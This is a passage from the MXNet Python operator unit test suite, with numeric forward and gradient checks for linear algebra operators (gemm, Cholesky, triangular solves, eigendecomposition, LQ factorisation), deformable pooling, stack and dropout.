stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
shape = (4, 4, 1, 1)
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw(test_potrf, [data_in], [res_potrf])
if grad_check == 1:
check_grad(test_potrf, [data_in])
# test potri
ones = mx.nd.ones(shape).asnumpy()
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw(test_potri, [data_in], [res_potri])
if grad_check == 1:
check_grad(test_potri, [data_in])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw(test_trsm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trsm, [trian_in,data_in])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw(test_trmm, [trian_in, data_in], [ones])
if grad_check == 1:
check_grad(test_trmm, [trian_in, data_in])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw(test_sumlogdiag, [data_in], [res_sumlogdiag])
if grad_check == 1:
check_grad(test_sumlogdiag, [data_in])
# more elaborate example of Cholesky factorization
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
low_trian = trian
if not lower:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw(test_potrf, [a], [r])
if grad_check == 1:
check_grad(test_potrf, [a])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw(test_potri, [a], [r])
if grad_check == 1:
check_grad(test_potri, [a])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw(test_trsm, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm, [a, b])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw(test_trsm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm2, [a, b])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw(test_trsm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm3, [a, b])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw(test_trsm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trsm4, [a, b])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = rep_3x(trian, 4, 4)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw(test_trmm, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm, [a, b])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw(test_trmm2, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm2, [a, b])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw(test_trmm3, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm3, [a, b])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw(test_trmm4, [a, b], [r])
if grad_check == 1:
check_grad(test_trmm4, [a, b])
# test sumlogdiag
a = rep_3x(pow, 4, 4)
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw(test_sumlogdiag, [a], [r])
if grad_check == 1:
check_grad(test_sumlogdiag, [a])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/14288")
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
